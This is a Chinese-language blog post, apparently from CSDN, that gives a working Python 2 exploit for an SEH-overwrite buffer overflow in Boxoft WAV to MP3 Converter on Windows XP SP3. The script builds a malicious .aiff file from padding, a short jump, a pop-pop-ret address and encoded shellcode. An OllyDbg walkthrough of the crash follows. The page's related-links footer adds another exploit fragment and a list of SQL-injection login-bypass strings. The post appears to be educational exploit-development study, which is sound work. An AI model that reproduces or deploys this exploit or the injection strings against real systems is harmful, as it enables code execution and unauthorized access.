Boxoft wav to mp3 converter SEH bypass technique tested on XP SP3

最新推荐文章于 2021-06-02 19:29:44 发布
最新推荐文章于 2021-06-02 19:29:44 发布
阅读量1k 收藏 5
点赞数 1
分类专栏: Information Security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41594045/article/details/102387651
版权

Win7下的测试请查询相关链接:
perl在Win7下的Exploit:https://www.exploit-db.com/exploits/38035

Windows XP SP3平台下测试:
分析过程:https://www.52pojie.cn/forum.php?mod=viewthread&tid=478524&aid=629593&from=album&page=1
#一定要用Python2进行编译。否则Exploit无效。
Python2 Exploit:

f = open("Expolit.aiff", "w")
f.write("A" * 4132)  # 4136 - 4
f.write("\xeb\x06\x90\x90") # jmp 06 nop nop
f.write("\xa4\x43\x40\x00")  # 构造 pop pop ret 这里利用了MessageBox函数

# Shelcode:
f.write("\x90" * 20)  #ShellCode前填充NOP
f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
"\xc4\xd9")   #弹出calc
f.write("\x90" * 20)#ShellCode 后填充Nop
f.close()

运行完py文件后,会生成一个Expolit.aiff,打开Wav to Mp3,将Expolit.aiff Add入,点击Convert To Mp3即可成功弹出计算器。

在这里插入图片描述
在这里插入图片描述

[2019/10/16]

补充分析:
这个实验目的是绕过SafeSEH的机制实现弹出计算器。
SafeSEH检测机制如下:
在这里插入图片描述
关于XP下如何查看DEP状态:
https://jingyan.baidu.com/article/454316ab73731ef7a7c03abe.html
在这里插入图片描述
可以看到这里默认是开启的。但是这“仅为”二字让我不解。
怎么样的程序才能算得上是“Windows程序和服务”呢?~

Anyway…Let’s start analysing
在这里插入图片描述
程序入OD,一直F8单步步过,至地址004C4E99弹出程序主界面后,将所生成的Exploit.aiff加入被测试软件,按下Play后继续分析。
在这里插入图片描述

在这里插入图片描述
单步运行了好几次,都是在004B9D85这个函数发生崩溃,因此可推断是在这个函数中发生了溢出。F2下个断点,重新运行并F7步入进行进一步分析。
在这里插入图片描述
在子函数中F8单步步过分析,发现004BA8A7处存在一个循环,不断地像堆栈中写入数据。[ 正是因为写入无校验,无限制,产生了溢出 ]
在这里插入图片描述
在这里插入图片描述
再单步F8。
在这里插入图片描述
找到了实际写数据的函数。每执行一次,多一个41。
在这里插入图片描述
一直写啊写啊,写了4132个41,将004BA8A7的RET
地址覆盖成了41414141,RET地址递交给EIP,并使得EIP的值变成了41414141。执行下一条指令为地址41414141中的指令。此内存不可读。产生异常,调用异常处理函数SEH Handler。执行地址004043A4中的处理代码。处理代码处理后执行Next SEH中的EB 06 90 90JMP 06,开始执行Shellcode,弹出计算器。
在这里插入图片描述
SEH处理异常的时候会向栈里压入两个参数所以栈溢出利用SEH结构的时候需要pop pop retn?
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

JacobTsang
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Boxoft WAV to MP3 Converter 1.1 漏洞分析及利用[SEH]
qq_36811299的博客
08-16 967
BoxSoft WAV to MP3 Converter缓冲区溢出
boxoft wav to mp3漏洞分析
weixin_30276935的博客
09-21 275
漏洞:https://www.exploit-db.com/exploits/38456/ 作者:wj2ge 测试环境:xp sp3 根据提供的EXP 然后OD附加调试,在ReadFile函数下断点,然后f9运行 点击PLAY 我们为了先大致看一下程序的执行流程,一直F8 发现一直在swich case里 循环 004BA881 |> /8BC7 ...
渗透之——触发Easy File Sharing Web Server 7.2 HEAD缓冲区溢出的Python脚本
冰河的专栏
01-16 7933
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86506264 脚本一: # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 2019-01-16 # Exploit Author...
html转换wma,WMA格式转换器(Boxoft All to WMA Converter)
weixin_33420201的博客
06-02 128
Boxoft All to WMA Converter是一款功能强大的WMA格式转换器,软件可以转换多种音频文件的软件,支持多种格式软件,而且还支持批量处理,它还允许您在后台转换或使用命令行。有需要的小伙伴欢迎来西西下载体验。软件功能:1、永远免费升级所有的产品都可以免费升级,一旦你购买了软件,你就可以永远使用它。我们保留为以后版本定价的权利,但您不需要支付一分钱用于升级。2、集成音频转换器BOX...
二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wavSEH Local Exploit
「鸿渐之翼」的博客
05-04 645
此次渗透测试针对软件 转换大师Boxoft Convert Master ‘wavSEH 本地攻击 实验平台:windows7 poc由Achilles提供 exp: import struct buffer = "\x41" * 4132 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x6d00c683) #CDRip122.dll nops = "\x90" * 20 #Bind=shellcode por
鸿蒙系统cut,Boxoft PDF PageCut
weixin_39603799的博客
05-28 336
Boxoft PDF PageCut是一款针对PDF文件打造的页面分割工具,可以让PDF文档页面变成更小的部分。它提供了可视化裁剪编辑器更方便地裁剪PDF页面,你可以把PDF页面分成两部分,很容易打印成两幅肖像页面。【功能特点】1、提供可视化裁剪编辑器。2、支持批量切割PDF页面;3、导出剪切设置作为规则文件以供将来使用;4、不同的页面可以应用不同的剪切设置;5、支持拖放切割线(垂直或水平分割线)...
免费好用的OCR文字识别软件推荐
qq_29785857的博客
04-28 3396
要将拍摄的图片转换成文字,最好的方法是借助OCR文字识别软件。在软件市场上,OCR软件的选择十分之多,新手在选择时可能会无从下手。本文将详细介绍最为流行、免费的OCR文字识别软件,并介绍详细的转换操作步骤。
BoxoftFLVConverter(FLV文件转换器)V1.0免费安装版
08-07
Boxoft FLV Converter是一个强大的批处理软件,你可以转换FLV文件变成其他视频或音频格式的文件,还设置图像帧数大小、视频大小、音频编解码器和其他参数,以此来创建自己的风格MP4、MPEG、WMV、MP3文件。...
BoxoftWMAtoWavconverter(音频转换工具)v1.0免费安装版
07-25
Boxoft WMA to Wav converter是一款不错的音频转换工具,使用该工具可以轻松的将WMA音频批量转换为高质量的WAV音频格式,效率非常的高,支持批量转换,欢迎有需要的前来下载使用! Boxoft WMA to Wav converter介绍...
MP4转MPG格式工具BoxoftFreeMP4toMPGConverter1.0官方安装版
08-07
Boxoft Free MP4 to MPG Converter是一款功能强大的MP4转MPG格式工具,可以处理多种视频格式。Boxoft Free MP4 to MPG Converter使用起来过程十分简单、快速。Boxoft Free MP4 to MPG Converter支持批量转换,可以...
BoxoftPhotoMagicMaker(免费照片装饰工具)V1.2免费安装版
08-06
Boxoft Photo Magic Maker是一款十分优秀的照片装饰助手。它为您提供全方位的魔术效果润色您的照片,只简单的点击,你就可以创造出令人惊叹的照片与多重惊人的效果,还能享受有趣的装饰过程,使您的照片更加动人可爱...
BoxoftPDFtoFlash(PDF文件批量转换FLASH)V1.1免费安装版
08-06
Boxoft PDF to Flash(PDF文件批量转换FLASHF)是一款功能非常强大的PDF转FLASH工具。一直不知道PDF文件该怎么转换成FLASHF?那就快试试脚本之家小编推荐的Boxoft PDF to Flash最新版下载使用。能够为你对PDF文件进行...
《现代密码学教程》| 谷利泽 | 课后答案 | 个人整理
热门推荐
JacobTsang的博客
06-25 2万+
第一章 | 密码学概论 第二章 | 密码学基础 第三章 | 古典密码体制 第四章 | 分组密码 第五章 | 序列密码 第六章 | Hash密码 第七章 | 公钥密码体制 第八章 | 数字密码签名 第九章 | 密码协议 第十章 | 密钥管理 ...
Wireshark修改数据包
JacobTsang的博客
11-08 2万+
新版本不行。 旧版本可以:https://www.wireshark.org/download/win64/all-versions/Wireshark-win64-1.12.8.exe
SQL注入万能密码字典
JacobTsang的博客
10-09 5878
"or "a"="a '.).or.('.a.'='.a or 1=1-- 'or 1=1-- a'or' 1=1-- "or 1=1-- 'or.'a.'='a "or"="a'='a 'or''=' 'or'='or' admin'or 1=1# admin'/* aaaa*/' 'or 1=1/* "or "a"="a "or 1=1-- "or"=" "or"="a'='a "or1=1...
古典密码体制 | 置换密码
JacobTsang的博客
06-22 5701
1)置换密码: 又称换位密码。将明文元素的位置进行系统的置换。 密文所包含的字符集与明文字符集相同。 最常见的两种类型:1、列置换密码 、2、周期置换密码 1.1)列置换密码: 明文遵照密钥规则按列换位,按列读出明文序列得到密文。 加密:明文分段,不足则填充,根据密钥以列为单位进行互换,按行从左到右写出,得到密文。 解密:密文分段,根据密钥逆置换以列为单位进行互换,按行从左到右写出,得到明文。 ...
.NET framework 是什么? 有何意义?
JacobTsang的博客
11-12 5310
.NET is a framework that Microsoft has introduced to develop applications easily. A framework can be understood as a collection of Application Programming Interfaces (APIs) and a set of code that a pr...
常用漏洞平台
JacobTsang的博客
09-18 4036
美国 1, 赛门铁克的漏洞库 https://www.securityfocus.com/ 2, 美国国家信息安全漏洞库 https://nvd.nist.gov/ 3, 全球信息安全漏洞指纹库与文件检测服务 http://cvescan.com 4, 美国著名安全公司Offensive Security的漏洞库https://www.exploit-db.com/ 5,CVE(美国国土安全资助的...
汇编实验1
JacobTsang的博客
09-29 3454
(1)要求实验者按照原样对源程序进行编辑,汇编后,根据TASM给出的错误信息对源程序进行修改,直到没有语法错误为止。然后进行链接,并执行相应的可执行文件。正确的执行结果是在屏幕上显示:25+9=34。 DATA SEGMENT SUM DB ?,? MESG DB '25+9=' DB 0,0,'$' N1 DB 9,0F0H N2 DW 25 DATA ENDS CODE...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值